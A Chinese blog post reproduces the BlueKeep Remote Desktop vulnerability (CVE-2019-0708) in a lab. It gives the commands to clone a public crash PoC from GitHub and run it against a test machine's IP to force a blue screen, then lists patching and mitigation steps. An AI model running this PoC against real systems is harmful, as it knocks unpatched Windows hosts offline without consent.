0x00 前言
2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了Windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的Windows系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證且無需用戶交互,這就意味著這個漏洞可以通過網(wǎng)絡(luò)蠕蟲的方式被利用。利用此漏洞的任何惡意軟件都可能從被感染的計(jì)算機(jī)傳播到其他易受攻擊的計(jì)算機(jī),其方式與2017年WannaCry惡意軟件的傳播方式類似。
以上內(nèi)容來自360網(wǎng)絡(luò)安全響應(yīng)中心。
從微軟官方的消息一出,各大安全廠商都開始發(fā)布了漏洞預(yù)警,那段時間我也一直在找對應(yīng)的POC,但要不就是不能利用的POC,要不就是利用以前漏洞寫的POC,更有甚著點(diǎn)擊attack后給你驚喜。

看到這個圖片的時候,真的一副生無可戀的樣子,隨著時間推移,漸漸的也就不怎么關(guān)注這個漏洞了。
直到今天,看到網(wǎng)上有人發(fā)一些關(guān)于這個漏洞的利用復(fù)現(xiàn)視頻的時候,才意識到已經(jīng)過去正好一個月的,此時POC也早就被公布了。
早在在5月31日的時候,n1xbyte就在Github上發(fā)布了利用該漏洞導(dǎo)致系統(tǒng)藍(lán)屏的可用POC ,所以我們來復(fù)現(xiàn)看看吧。
0x01 下載POC
首先git clone代碼
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708

0x02 開始復(fù)現(xiàn)
1、為了順利復(fù)現(xiàn)成功,需要將被攻擊機(jī)的遠(yuǎn)程桌面設(shè)為允許,防火墻也需要關(guān)掉。
2、被攻擊機(jī)的IP地址與操作系統(tǒng)信息如下:
#被攻擊主機(jī)
ip地址:192.168.1.106
系統(tǒng)類型:64位
3、安裝需要的庫后執(zhí)行POC
pip3 install impacket
python3 crashpoc.py 192.168.1.106 64 #python3 crashpoc.py ip地址 系統(tǒng)類型

POC被成功被執(zhí)行,雖然現(xiàn)階段只是讓目標(biāo)藍(lán)屏,但是對這個漏洞的利用手段絕對不會止步于此。
0x03 修復(fù)方案
1、最簡便的方法就是安裝一個安全管家,比如火絨、360之類的
2、把系統(tǒng)的自動更新打開或者到微軟官網(wǎng)下載補(bǔ)丁
3、把自己電腦上的遠(yuǎn)程桌面關(guān)掉、防火墻開啟
0x04 小結(jié)
總是有人說沒有絕對的安全,當(dāng)然事實(shí)也確實(shí)是如此,但是只要我們平時養(yǎng)成一個良好的安全習(xí)慣,還是可以避免很多病毒木馬的侵害的,畢竟很多的惡意程序都是廣撒網(wǎng),捕的魚多不多就是另一回事兒了。
最后再次強(qiáng)調(diào),不得將本文用作違法犯罪目的,本文只用作技術(shù)分享交流學(xué)習(xí)使用。
更多信息歡迎關(guān)注我的微信公眾號:teamssix
原文地址:https://www.teamssix.com/year/190615-013724.html
視頻演示地址:https://www.bilibili.com/video/av55626994/